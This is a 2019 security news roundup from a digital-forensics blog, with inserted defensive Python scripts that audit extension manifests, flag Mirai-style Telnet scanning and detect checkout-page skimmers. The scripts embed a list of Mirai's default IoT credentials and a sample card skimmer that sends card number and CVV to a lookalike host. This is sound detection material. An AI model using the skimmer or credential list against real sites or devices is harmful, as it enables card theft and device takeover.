AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

Blog Post

InfoSec News Nuggets – February 25, 2019

1 A third of all Chrome extensions request access to user data on any site

The same survey found that roughly 85 percent of the 120,000 extensions listed on the Chrome Web Store have no privacy policy, meaning there is no legally binding document describing how the developer commits to handling user data. Additional findings include that 77 percent of the tested extensions listed no support site, 32 percent used third-party JavaScript libraries with publicly known vulnerabilities, and nine percent could read cookies, some of which are used for authentication. The survey was carried out last month by Duo Labs, the research team at US security firm Duo Security, with the help of a new web service they developed, called CRXcavator.
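The "access to user data on any site" finding comes down to host permissions: an extension whose manifest matches every URL (the `<all_urls>` pattern or a scheme-wide wildcard such as `*://*/*`, whether in `permissions`, `host_permissions` or a content script's `matches`) can read and modify any page the user opens. The script below is an added example, not code from the original post and not Duo's CRXcavator; it audits a parsed manifest for that condition and for API permissions that reach user data directly. The two manifests and the `SENSITIVE` set are my own constructions for illustration.

```python
"""Audit Chrome extension manifests for access to every site.

Added example: not from the original post and not Duo Labs' CRXcavator code.
The manifests below are constructed. Match patterns follow Chrome's documented
host-permission syntax; SENSITIVE is an assumed list of API permissions that
expose user data beyond page content.
"""
import json

# Host patterns that grant access on every origin the user visits.
ALL_SITES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# API permissions that reach user data directly (assumed, not exhaustive).
SENSITIVE = {"cookies", "webRequest", "webRequestBlocking", "tabs", "history",
             "clipboardRead", "webNavigation"}


def _is_host_pattern(p):
    return p == "<all_urls>" or "://" in p


def host_patterns(manifest):
    """Collect every host pattern the extension can act on (MV2 or MV3)."""
    hosts = set()
    # MV2 mixes host patterns into "permissions"; MV3 moved them to "host_permissions".
    hosts |= {p for p in manifest.get("permissions", []) if _is_host_pattern(p)}
    hosts |= set(manifest.get("host_permissions", []))
    # Content scripts are injected by their own "matches", independent of permissions.
    for cs in manifest.get("content_scripts", []):
        hosts |= set(cs.get("matches", []))
    # Note: "optional_permissions" are deliberately not counted here; they need a
    # runtime prompt before they take effect.
    return hosts


def audit_manifest(manifest):
    """Return the all-sites patterns, sensitive APIs and a coarse risk label."""
    hosts = host_patterns(manifest)
    all_sites = sorted(h for h in hosts if h in ALL_SITES)
    sensitive = sorted(p for p in manifest.get("permissions", []) if p in SENSITIVE)
    if all_sites and sensitive:
        risk = "high"      # can read every page AND e.g. every cookie
    elif all_sites:
        risk = "medium"    # can read every page the user opens
    else:
        risk = "low"
    return {"name": manifest.get("name", "?"), "all_sites": all_sites,
            "sensitive_api": sensitive, "risk": risk}


def audit_manifest_text(text):
    """Convenience wrapper for a raw manifest.json string."""
    return audit_manifest(json.loads(text))


# Constructed manifests (hypothetical extensions, not real Web Store items).
MV2_COUPON = json.dumps({"manifest_version": 2, "name": "Coupon Helper",
                         "permissions": ["cookies", "<all_urls>", "storage"]})
MV3_THEME = json.dumps({"manifest_version": 3, "name": "Site Theme",
                        "permissions": ["storage"],
                        "host_permissions": ["https://shop.example/*"],
                        "content_scripts": [{"matches": ["*://*/*"], "js": ["theme.js"]}]})
MV3_NOTES = json.dumps({"manifest_version": 3, "name": "Notes",
                        "permissions": ["storage"]})

if __name__ == "__main__":
    for m in (MV2_COUPON, MV3_THEME, MV3_NOTES):
        print(audit_manifest_text(m))
```

The second manifest is the case that a permissions-only review misses: its declared host permission is a single site, but the content script's `matches` still runs it on every page.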


2 IoT botnets target enterprise video conferencing systems

In August, researchers from IoT security startup WootCloud discovered a botnet dubbed OMNI that was infecting business video conferencing systems made by Polycom. Since then, the company has seen three additional botnets targeting the same type of systems in addition to other Linux-based embedded devices. The three new botnets that target Polycom HDX series endpoints are called Bushido, Hades and Yowai and are based on the Mirai botnet whose source code was leaked in 2016. Mirai successfully infected hundreds of thousands of IoT devices and was used to launch some of the largest distributed denial-of-service (DDoS) attacks in history. It spread primarily via Telnet connections in a worm-like manner by taking advantage of the fact that many users don't change the default administrative credentials on their smart devices.
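Because Mirai-family scanners work through a fixed list of factory credentials over Telnet, the pattern is easy to spot in a Telnet honeypot or device authentication log: one source trying several well-known vendor defaults in quick succession. The script below is an added example (not part of the original post or of WootCloud's research) that parses constructed honeypot log lines and flags sources whose attempts match that list. The log format and IP addresses are invented; the credential pairs are a small subset of the hard-coded list in the leaked 2016 Mirai source, reproduced from memory and labelled as such.

```python
"""Flag Mirai-style default-credential scanning in Telnet honeypot logs.

Added example; not from the original post or WootCloud. The log lines and
their format are constructed. MIRAI_DEFAULTS is a partial list of the pairs
hard-coded in the leaked Mirai scanner, reproduced from memory: illustrative,
not exhaustive.
"""
import re
from collections import defaultdict

MIRAI_DEFAULTS = {
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"), ("admin", "admin"),
    ("root", "888888"), ("root", "xmhdipc"), ("root", "default"), ("root", "juantech"),
    ("root", "123456"), ("root", "54321"), ("support", "support"), ("root", ""),
    ("admin", "password"), ("root", "root"), ("root", "12345"), ("user", "user"),
    ("admin", ""), ("root", "pass"), ("admin", "admin1234"), ("root", "1111"),
    ("admin", "smcadmin"), ("root", "666666"), ("root", "password"), ("root", "1234"),
    ("ubnt", "ubnt"), ("root", "7ujMko0vizxv"), ("root", "7ujMko0admin"),
    ("root", "system"), ("root", "realtek"), ("admin", "1234"), ("tech", "tech"),
}

# Constructed line format: ISO timestamp, source IP, username, password, outcome.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) user=(?P<user>\S*) pass=(?P<pw>\S*) result=(?P<res>\w+)$"
)

# Constructed sample: one Mirai-like scanner, one human typo, one stray hit.
SAMPLE_LOG = """\
2019-02-24T03:14:07Z src=203.0.113.5 user=root pass=xc3511 result=failed
2019-02-24T03:14:09Z src=203.0.113.5 user=root pass=vizxv result=failed
2019-02-24T03:14:11Z src=203.0.113.5 user=admin pass=admin result=failed
2019-02-24T03:14:13Z src=203.0.113.5 user=root pass=888888 result=success
2019-02-24T03:20:41Z src=198.51.100.7 user=alice pass=hunter2 result=failed
2019-02-24T03:20:48Z src=198.51.100.7 user=alice pass=Hunter2! result=success
2019-02-24T03:31:02Z src=192.0.2.9 user=root pass=xc3511 result=failed
"""


def parse_log(text):
    """Parse lines into dicts; lines that do not fit the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def find_mirai_scanners(events, min_attempts=3, min_default_hits=2):
    """Return per-source stats for sources that look like Mirai-family scanning.

    A source is flagged when it made at least min_attempts logins and at least
    min_default_hits of them used a known Mirai default pair. 'success' records
    whether the device actually accepted one of the attempts.
    """
    per_src = defaultdict(lambda: {"attempts": 0, "default_hits": [], "success": False})
    for e in events:
        s = per_src[e["src"]]
        s["attempts"] += 1
        pair = (e["user"], e["pw"])
        if pair in MIRAI_DEFAULTS:
            s["default_hits"].append(pair)
        if e["res"] == "success":
            s["success"] = True
    return {src: s for src, s in per_src.items()
            if s["attempts"] >= min_attempts and len(s["default_hits"]) >= min_default_hits}


if __name__ == "__main__":
    for src, stats in find_mirai_scanners(parse_log(SAMPLE_LOG)).items():
        print(src, stats)
```

The thresholds keep a single stray `root/xc3511` (192.0.2.9 above) out of the result; a flagged source with `success` set means a device on your network accepted a factory credential and should be treated as compromised, not merely probed.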


3 Misconfigured database exposes 974,000 University of Washington Medicine patients

Almost one million University of Washington (UW) Medicine personal health information files were exposed for most of December 2018 due to a misconfigured database. UW Medicine reported that files on one of its web servers were indexed by and searchable on the internet from December 4 to 26, exposing data on 974,000 patients. UW said the delay in reporting the breach was due to the time it took to conduct the initial investigation. The files contained patient names, medical record numbers, with whom UW Medicine shared the information, a description of what information was shared (for example, "demographics", "office visits" or "labs") and the reason for the disclosure, such as mandatory reporting or screening to see whether a patient qualified for a research study, UW said. In some cases, the files included the name of a lab test that was performed (but not the result) or the name of a research study, which could itself name a health condition.


4 Mark Zuckerberg says Facebook has been an 'innovator in privacy'

In a discussion with Harvard law professor Jonathan Zittrain, Zuckerberg said that Facebook has been a developer of cutting-edge private communication tools since the service's early days at Harvard, and that the company continues to focus on improving them. "Thinking about Facebook as an innovator in privacy is certainly not the mainstream view," Zuckerberg said during the taped conversation, which was released publicly on Wednesday. "But going back to the very first thing that we did, making it so Harvard students could communicate in a way that they had some confidence that their content and information would be shared with only people within that community, there was no way that people had to communicate stuff at that scale but not have it either be just completely public or just as small as it had been before."


5 Major ad scam 'DrainerBot' is rinsing Android users of their battery life and data

A major ad fraud operation could be sucking your phone of juice and using up more than 10GB of data a month by downloading hidden vids, Oracle has claimed. The database vendor has dubbed the dodgy data slurper DrainerBot, and said it uses infected code on Android devices to deliver fraudulent, invisible video ads. Infected apps consume "significant bandwidth and battery", Big Red said. The discovery was made by teams in two of Oracle's fairly recent acquisitions – ad-tracking biz Moat and internet infrastructure outfit Dyn – after they spotted significant increases in browsing activity from Android apps.


6 Cybercrime Groups Promising $360,000 Annual Salaries to Accomplices Helping to Extort High Net Worth Individuals

Digital Shadows, the leader in Digital Risk Protection, has today published new research looking at the business of cyber extortion. Entitled ‘A Tale of Epic Extortions’ it reveals that criminal groups are promising salaries averaging the equivalent of $360,000 per year to accomplices who can help them target high-worth individuals, such as company executives, lawyers and doctors with extortion scams. These salary promises can be higher still for those with network management, penetration testing and programming skills – with one threat actor willing to pay the equivalent of $768,000 per year, with add-ons and a final salary after the second year of $1,080,000 per year.


7 As fallout over pedophilia content on YouTube continues, AT&T and Hasbro pull all advertisements

AT&T and Hasbro are the latest companies to pull their ads from Google's YouTube following reports that pedophiles have latched onto videos of young children, often girls, marking timestamps that show child nudity and objectifying the children in YouTube's comments section. "Until Google can protect our brand from offensive content of any kind, we are removing all advertising from YouTube," an AT&T spokesperson told CNBC. The company originally pulled its entire ad spend from YouTube in 2017 after revelations that its ads were appearing alongside offensive content, including terrorist content, but resumed advertising in January.


8 Ransomware out, formjacking in as primary attack vectors

Quick and easy attack methods like formjacking gained popularity among cybercriminals last year, while more tried and true approaches like ransomware fell by the wayside in 2018, according to a new report. The reasoning behind this switch, according to Symantec's just-released Internet Security Threat Report, is straightforward. Formjacking, which entails injecting malicious JavaScript into an e-commerce site's checkout pages so that payment card details are copied to the attacker as customers type them into the form, is simple to perform and offers an incredibly high yield. Symantec's research found that on average a stolen payment card sells on the dark web for about $45, and with roughly 4,800 websites compromised each month, even if only a small number of cards is stolen from each incident the money quickly piles up for the thieves.
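Since the skimmer runs in the shopper's browser rather than on the merchant's server, the evidence is in the served page: a script tag pointing at a host the site never intended to load from, or an inline script that reads the card fields and then sends data somewhere. The scanner below is an added example, not from the original post or Symantec's report. It collects the script tags from a checkout page, reports external scripts whose host is not on the site owner's allowlist or that lack a Subresource Integrity attribute, and flags inline scripts that both read form fields and ship data off the page. The page, hostnames and field names are constructed.

```python
"""Scan a checkout page for signs of formjacking (web skimming).

Added example; not from the original post or from Symantec. The HTML is a
constructed first-party checkout page with an injected skimmer. The allowlist,
hostnames and the two heuristic patterns are my own assumptions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site owner expects to load script from (assumed allowlist).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}

# Inline-script heuristics: reads form/card fields AND sends data off-page.
READS_FORM = re.compile(r"(querySelector|getElementById|getElementsBy\w+|FormData|\.value\b)")
EXFILTRATES = re.compile(r"(fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=|WebSocket\()")


class _ScriptCollector(HTMLParser):
    """Gather external script srcs (with SRI presence) and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []   # (src, has_integrity_attribute)
        self.inline = []     # inline script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def scan_checkout_page(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (finding_kind, detail) tuples in document order."""
    p = _ScriptCollector()
    p.feed(html)
    findings = []
    for src, has_sri in p.external:
        host = (urlparse(src).hostname or "").lower()
        if host not in allowed_hosts:
            findings.append(("unexpected_script_host", src))   # classic injected tag
        elif not has_sri:
            findings.append(("missing_sri", src))              # a swapped CDN file would go unnoticed
    for body in p.inline:
        if READS_FORM.search(body) and EXFILTRATES.search(body):
            findings.append(("inline_skimmer_pattern", body.strip()[:60]))
    return findings


# Constructed page: a lookalike host and an inline skimmer have been injected.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.shop.example/checkout.js" integrity="sha384-constructed"></script>
<script src="https://cdn.shop.example/analytics.js"></script>
<script src="https://cdn-shop-example.com/jquery.min.js"></script>
</head><body>
<form id="pay"><input id="cc" name="cardnumber"><input id="cvv" name="cvv"></form>
<script>
document.getElementById("pay").addEventListener("submit", function () {
  var d = document.getElementById("cc").value + "|" + document.getElementById("cvv").value;
  new Image().src = "https://cdn-shop-example.com/i.gif?d=" + btoa(d);
});
</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_checkout_page(SAMPLE_PAGE):
        print(kind, detail)
```

The inline heuristic will also fire on legitimate first-party checkout code that posts the form itself, so treat it as a triage signal to be compared against a known-good copy of the page rather than a verdict; the unexpected-host check is the higher-confidence one.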


9 California to close data breach notification loopholes under new law

California, which has some of the strongest data breach notification laws in the U.S., thinks it can do even better. The Golden State's attorney general Xavier Becerra announced a new bill Thursday that aims to close loopholes in its existing data breach notification laws by expanding the requirement for companies to notify users or customers when their passport and government ID numbers, along with biometric data such as fingerprints and iris and facial recognition scans, have been stolen. The updated draft legislation lands a few months after the Starwood hack, which Becerra and Democratic state assembly member Marc Levine, who introduced the bill, said prompted the law change.


10 Google: Software is never going to be able to fix Spectre-type bugs

Researchers from Google investigating the scope and impact of the Spectre attack have published a paper asserting that Spectre-like vulnerabilities are likely to be a continued feature of processors and, further, that software-based techniques for protecting against them will impose a high performance cost and still be incomplete: some Spectre variants appear to have no effective software-based defense at all. As such, the researchers conclude, Spectre is going to be a continued feature of the computing landscape, with no straightforward resolution.


11 No, Airlines Aren't Watching You With Cameras (Yet)

“Cameras are a standard feature on many in-flight entertainment systems used by multiple airlines,” Feinstein told Lifehacker. “Manufacturers of those systems have included cameras for possible future uses such as seat-to-seat video conferencing. While these cameras are present on some American Airlines in-flight entertainment systems as delivered from the manufacturer, they have never been activated and American is not considering using them.” In other words, it’s the manufacturers’ fault for installing cameras that American Airlines and other airlines had no intention of ever using, but purchased anyway.


12 Intel’s neuro guru slams deep learning: ‘it’s not actually learning’

"Backpropagation doesn't correlate to the brain," insists Mike Davies, head of Intel's neuromorphic computing unit, dismissing one of the key tools of the species of A.I. in vogue today, deep learning. For that reason, "it's really an optimization procedure, it's not actually learning." Davies made the comment during a talk on Thursday at the International Solid-State Circuits Conference in San Francisco, a prestigious annual gathering of semiconductor designers. Davies was returning fire after Facebook's Yann LeCun, a leading apostle of deep learning, earlier in the week dismissed Davies's own technology during LeCun's opening keynote for the conference.


13 ICANN warns of “ongoing and significant” attacks against internet’s DNS infrastructure

The internet's address book keeper has warned of an "ongoing and significant risk" to key parts of the domain name system infrastructure, following months of increased attacks. The Internet Corporation for Assigned Names and Numbers, or ICANN, issued the notice late Friday, saying DNS, which translates human-readable domain names into numerical internet addresses, has been the victim of "multifaceted attacks utilizing different methodologies." It follows similar warnings from security companies and the federal government in the wake of attacks believed to be orchestrated by nation-state hackers.


14 Microsoft hails revamped goggles as more immersive and easy to wear

Microsoft unveiled the latest version of its HoloLens augmented reality headset on Sunday, promising wearers would feel more immersed in the augmented reality experience and more comfortable. Slipping on the carbon fiber goggles is as “simple as putting on your favorite hat”, Microsoft developer Alex Kipman told a launch event at the mobile industry’s biggest trade fair in Barcelona. Augmented reality devices overlay images as holograms on to a user’s real-life field of vision, aiming to improve efficiency at businesses ranging from doctors’ offices to factory floors. Microsoft showed off how the HoloLens 2 can track eye movements, and allow wearers to feel as though they can touch and manipulate holograms – playing a hologram piano and changing the speeds on a hologram windfarm installation.


15 LinkedIn Messaging Abused to Target US Companies With Backdoors

A series of malware campaigns that push the More_eggs backdoor via fake job offers are targeting employees of US companies that use shopping portals and similar online payment systems. The final payload used in this phishing campaign is always the JavaScript-based backdoor known as More_eggs, a malware strain designed to allow the attackers to control the compromised machines remotely and to drop extra malware payloads on their victims' computers. More_eggs was initially identified by Trend Micro during the summer of 2017 and has since been used in multiple malicious e-mail campaigns targeting Eastern European financial institutions and manufacturers of ATMs and other payment systems.


16 Federal Judge Throws Out Washington State Cyberstalking Law, Writing It Criminalizes Protected Speech

A federal judge in Washington has thrown out the state’s 2004 law prohibiting cyberstalking after finding that its barriers against speech that is intended to “harass, intimidate, torment, or embarrass” were too vague and violated the Constitution, per the Electronic Frontier Foundation. In his ruling, United States District Judge Ronald Bruce Leighton wrote that the law’s “breadth—by the plain meaning of its words—includes protected speech that is not exempted from protection by any of the recognized areas just described,” as well as that it “criminalizes a large range of non-obscene, non-threatening speech, based only on (1) purportedly bad intent and (2) repetition or anonymity.”


17 Payroll Provider Gives Extortionists a Payday

Payroll software provider Apex Human Capital Management suffered a ransomware attack this week that severed payroll management services for hundreds of the company’s customers for nearly three days. Faced with the threat of an extended outage, Apex chose to pay the ransom demand and begin the process of restoring service to customers. Roswell, Ga. based Apex HCM is a cloud-based payroll software company that serves some 350 payroll service bureaus that in turn provide payroll services to small and mid-sized businesses. At 4 a.m. on Tuesday, Feb. 19, Apex was alerted that its systems had been infected with a destructive strain of ransomware that encrypts computer files and demands payment for a digital key needed to unscramble the data.


18 Telephone Scams: Your Credit Card was Used in Fraudulent Activities

Everyone by now should have heard about the telephone scams involving a caller who claims to be from the CRA (Canada Revenue Agency) or the IRS (Internal Revenue Service). These tax agency scams generally receive the most coverage, but others get far less attention. Recently, people have also received calls from individuals claiming to be an employee of their "bank," who inform the recipient that their credit card has been used in fraudulent activities.


19 Prosecutors recommend prison sentence in 'celebgate' hacking case

Federal prosecutors have recommended a sentence of nearly three years in prison for a former Virginia high school teacher convicted of hacking into private digital accounts of celebrities and others. Christopher Brannan pleaded guilty in October to aggravated identity theft and unauthorized access to a protected computer. He was the fifth person charged in the 2014 "celebgate" scandal in which hackers obtained nude photographs and other private information from more than 200 people. Actresses Jennifer Lawrence and Mary Elizabeth Winstead are among the celebrities who said they were victims. Brannan is a former teacher at Lee-Davis High School in Mechanicsville.
